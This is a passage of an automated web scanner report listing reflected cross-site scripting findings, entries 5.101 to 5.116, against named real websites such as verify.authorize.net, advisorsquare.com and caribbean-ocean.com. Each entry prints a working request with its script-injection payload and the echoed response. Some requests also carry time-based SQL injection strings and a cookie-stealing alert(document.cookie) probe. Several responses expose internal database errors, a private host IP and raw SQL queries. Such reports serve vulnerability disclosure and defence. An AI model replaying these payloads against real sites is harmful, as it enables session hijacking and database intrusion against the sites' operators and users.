P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--; expires=Sat, 07-May-2016 04:38:39 GMT; path=/; domain=.mmismm.com
Content-Length: 458
Content-Type: text/javascript

document.write('<script type="text/javascript">var D=new Date();var Z=D.getTimezoneOffset();var R="";if(typeof document.referrer!=="undefined"){R="&ref="+encodeURIComponent(document.referrer);}</'+'sc
...[SNIP]...
<script type="text/javascript" src="http://syndication.mmismm.com/two.php?mm_pub=7348&fe082';alert(1)//d9fdfca37be=1&origin='+encodeURIComponent(document.URL)+'&tzos='+Z+R+'&cb='+Math.floor(Math.random()*0xffffffff)+'">
...[SNIP]...

5.101. http://tours.sapha.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe24"><script>alert(1)</script>d23c10e9ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&scs_tid=1488&bfe24"><script>alert(1)</script>d23c10e9ae=1 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:52:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
scs_tsu=aHR0cDovL2FwcHMuc2FwaGEuY29tL2hvb2t0b3VyL3RvdXJzZXJ2aWNlLnBocA%3D%3D&scs_tourid=1488&scs_ac=2546&scs_purl=http://tours.sapha.com/?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&scs_tid=1488&bfe24"><script>alert(1)</script>d23c10e9ae=1">
...[SNIP]...

5.102. http://tours.sapha.com/ [scs_sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /

Issue detail

The value of the scs_sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d405"><script>alert(1)</script>80fbcfd4b8c was submitted in the scs_sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+3d405"><script>alert(1)</script>80fbcfd4b8c&scs_tid=1488 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:13:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
hvars" value="scs_tsu=aHR0cDovL2FwcHMuc2FwaGEuY29tL2hvb2t0b3VyL3RvdXJzZXJ2aWNlLnBocA%3D%3D&scs_tourid=1488&scs_ac=2546&scs_purl=http://tours.sapha.com/?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+3d405"><script>alert(1)</script>80fbcfd4b8c&scs_tid=1488">
...[SNIP]...

5.103. http://tours.sapha.com/ [scs_tid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /

Issue detail

The value of the scs_tid request parameter is copied into the HTML document as plain text between tags. The payload 69442<script>alert(1)</script>7db2dee7925 was submitted in the scs_tid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?scs_sid=2546&scs_tid=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000074)%3C/script%3E69442<script>alert(1)</script>7db2dee7925&scscs=1 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 603

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT 1 FROM site_application t1 WHERE t1.site_application_isactive = 1 A
...[SNIP]...
</script>69442<script>alert(1)</script>7db2dee7925<br>
...[SNIP]...

5.104. https://verify.authorize.net/anetseal/ [rurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://verify.authorize.net
Path:   /anetseal/

Issue detail

The value of the rurl request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e4830%20style%3dx%3aexpr/**/ession(alert(1))%20dfd967efe8f was submitted in the rurl parameter. This input was echoed as e4830 style=x:expr/**/ession(alert(1)) dfd967efe8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /anetseal/?pid=3de2b6f5-d068-4960-b93c-80b3d36d8ffe&rurl=https%3A//www.clone-systems.com/ecommerce/login.php%3Faction%3Dsend_password_emaile4830%20style%3dx%3aexpr/**/ession(alert(1))%20dfd967efe8f HTTP/1.1
Host: verify.authorize.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:17:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI NID NAV"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5955


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head>
<title>Authorize.Net Verified Merchant Seal</title>
<meta name="GENERATOR" Content="Microsoft Visual St
...[SNIP]...
<a href= https://www.clone-systems.com/ecommerce/login.php?action=send_password_emaile4830 style=x:expr/**/ession(alert(1)) dfd967efe8f >
...[SNIP]...

5.105. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 44a0a<script>alert(1)</script>21007e051bb was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///D%3A/acunetix_reports/reports/firstmateonlinecom/blind-sql-injection-xss-dork-cross-site-scripting-poc-report.html44a0a<script>alert(1)</script>21007e051bb HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 200 OK
Age: 0
Date: Fri, 06 May 2011 20:09:07 GMT
Via: NS-CACHE: 100
Etag: "4ee52e4d9af28f6ad0ba9e9bb34c78553fba3e28"
Content-Length: 205
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Fri, 06 May 2011 20:19:06 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///D:/acunetix_reports/reports/firstmateonlinecom/blind-sql-injection-xss-dork-cross-site-scripting-poc-report.html44a0a<script>alert(1)</script>21007e051bb", "diggs": 0});

5.106. http://www.advisorsquare.com/useradmin/Authenticate.asp [ComeBack parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.advisorsquare.com
Path:   /useradmin/Authenticate.asp

Issue detail

The value of the ComeBack request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6348c"><script>alert(1)</script>e788ceeb686 was submitted in the ComeBack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /useradmin/Authenticate.asp?GroupId=85732&ComeBack=/useradmin/YourCPPortfolio.asp6348c"><script>alert(1)</script>e788ceeb686 HTTP/1.1
Host: www.advisorsquare.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2188
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=DCCHGKOBPLPMPBMHHEMNDHHG; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:36:54 GMT

<html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff >
           
           <form action="authenticate.asp" method="post">
...[SNIP]...
<input type="hidden" Name="ComeBack" value="/useradmin/YourCPPortfolio.asp6348c"><script>alert(1)</script>e788ceeb686">
...[SNIP]...

5.107. http://www.advisorsquare.com/useradmin/Authenticate.asp [GroupId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.advisorsquare.com
Path:   /useradmin/Authenticate.asp

Issue detail

The value of the GroupId request parameter is copied into an HTML comment. The payload f8cb1--><script>alert(1)</script>c3e8d872928 was submitted in the GroupId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /useradmin/Authenticate.asp?GroupId=85732f8cb1--><script>alert(1)</script>c3e8d872928&ComeBack=/useradmin/YourCPPortfolio.asp HTTP/1.1
Host: www.advisorsquare.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2233
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=HACHGKOBLIOECFPOADGMADDH; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:36:51 GMT

<html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff >
           
           <form action="authenticate.asp" method="post">
...[SNIP]...
<input type="hidden" name="AdvisorID" value="85732f8cb1--><script>alert(1)</script>c3e8d872928">
...[SNIP]...

5.108. http://www.advisorsquare.com/useradmin/Authenticate.asp [GroupId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.advisorsquare.com
Path:   /useradmin/Authenticate.asp

Issue detail

The value of the GroupId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9045"><script>alert(1)</script>8c93197ec3e was submitted in the GroupId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /useradmin/Authenticate.asp?GroupId=85732e9045"><script>alert(1)</script>8c93197ec3e&ComeBack=/useradmin/YourCPPortfolio.asp HTTP/1.1
Host: www.advisorsquare.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2231
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=EACHGKOBOILHIFCFOLHPDECB; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:36:51 GMT

<html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff >
           
           <form action="authenticate.asp" method="post">
...[SNIP]...
<input type="hidden" name="GroupID" value="85732e9045"><script>alert(1)</script>8c93197ec3e">
...[SNIP]...

5.109. http://www.brownrudnick.com/nr/alertsArchv.asp [Year parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /nr/alertsArchv.asp

Issue detail

The value of the Year request parameter is copied into the HTML document as plain text between tags. The payload 431bc<script>alert(1)</script>069fa5b0117 was submitted in the Year parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nr/alertsArchv.asp?Year=2006431bc<script>alert(1)</script>069fa5b0117 HTTP/1.1
Cookie: ASPSESSIONIDSSSASTRS=AOLLAMJAKHMOMMMNLJCHGNIN
Host: www.brownrudnick.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 06 May 2011 18:47:10 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 13992
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQRDRRTT=KPGCALMBKHIIAMHHIBKADIIJ; path=/
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Alerts and Newsletters -
...[SNIP]...
</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(Year = 2006431bc<script>alert(1)</script>069fa5b0117)'.<br>
...[SNIP]...

5.110. http://www.brownrudnick.com/nr/articlesindv.asp [ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /nr/articlesindv.asp

Issue detail

The value of the ID request parameter is copied into the HTML document as plain text between tags. The payload 5d6aa<script>alert(1)</script>78389e1a6ea was submitted in the ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nr/articlesindv.asp?ID=554f0bd0<script>alert(document.cookie)</script>ba5591b9a235d6aa<script>alert(1)</script>78389e1a6ea HTTP/1.1
Pragma: no-cache
Host: www.brownrudnick.com
Connection: Keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 06 May 2011 18:48:17 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11278
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQRDRRTT=EEHCALMBMMHJOCDFIKKJMEBE; path=/
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Articles</title>
<link r
...[SNIP]...
</script>ba5591b9a235d6aa<script>alert(1)</script>78389e1a6ea)'.<br>
...[SNIP]...

5.111. http://www.caribbean-ocean.com/accommodation2.php [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 3ff42<a>78f0dfbcbea was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /accommodation2.php?id=82893ff42<a>78f0dfbcbea HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:24 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 9767

1054: Unknown column '82893ff42' in 'where clause'<br /><br /><textarea rows="10" cols="100">SELECT area_id AS country_id
FROM accommodation
WHERE accomm_id = 82893ff42<a>78f0dfbcbea</textarea>
...[SNIP]...

5.112. http://www.caribbean-ocean.com/accommodation2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 42305%3balert(1)//992dbf45a01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 42305;alert(1)//992dbf45a01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accommodation2.php?id=/42305%3balert(1)//992dbf45a018289 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:42 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 10262

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/42305;alert(1)//992dbf45a018289' at line 1<br /><br /><textarea rows="10" cols="100">SELECT area_id AS country_id
FROM accommodation
WHERE accomm_id = /42305;alert(1)//992dbf45a018289</textarea>
...[SNIP]...

5.113. http://www.caribbean-ocean.com/get-image.php [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload b4e6a<a>5d16744a2c was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /get-image.php?id=18696b4e6a<a>5d16744a2c HTTP/1.1
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.caribbean-ocean.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 15:59:44 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 847
Content-Type: image/jpg

1054: Unknown column '18696b4e6a' in 'where clause'<br /><br /><textarea rows="10" cols="100">SELECT image
FROM image
WHERE image_id = 18696b4e6a<a>5d16744a2c</textarea>
Warning: mysql_num_r
...[SNIP]...

5.114. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c0726<a>c9b4bd0777c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /get-image.php?id=1/c0726<a>c9b4bd0777c8696 HTTP/1.1
Cookie: PHPSESSID=56e9tj63arfnmfkpi7rsto854a5vfekl
Host: www.caribbean-ocean.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:58:43 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 844
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpg

1054: Unknown column 'c0726' in 'where clause'<br /><br /><textarea rows="10" cols="100">SELECT image
FROM image
WHERE image_id = 1/c0726<a>c9b4bd0777c8696</textarea>
Warning: mysql_num_rows
...[SNIP]...

5.115. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Barbados%20Resort%20holidays/91

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8cbea<script>alert(1)</script>7cda621b4b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /luxury%20Barbados%20Resort%20holidays/918cbea<script>alert(1)</script>7cda621b4b3 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:56 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6943

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<textarea rows="10" cols="100">SELECT *
FROM area
WHERE area_id IN (918cbea<script>alert(1)</script>7cda621b4b3)
ORDER BY area_name ASC</textarea>
...[SNIP]...

5.116. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Jamaica%20Resort%20holidays/105

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4529a<script>alert(1)</script>38d4ed9b16f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /luxury%20Jamaica%20Resort%20holidays/1054529a<script>alert(1)</script>38d4ed9b16f HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:24 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6944

<html>
<head>
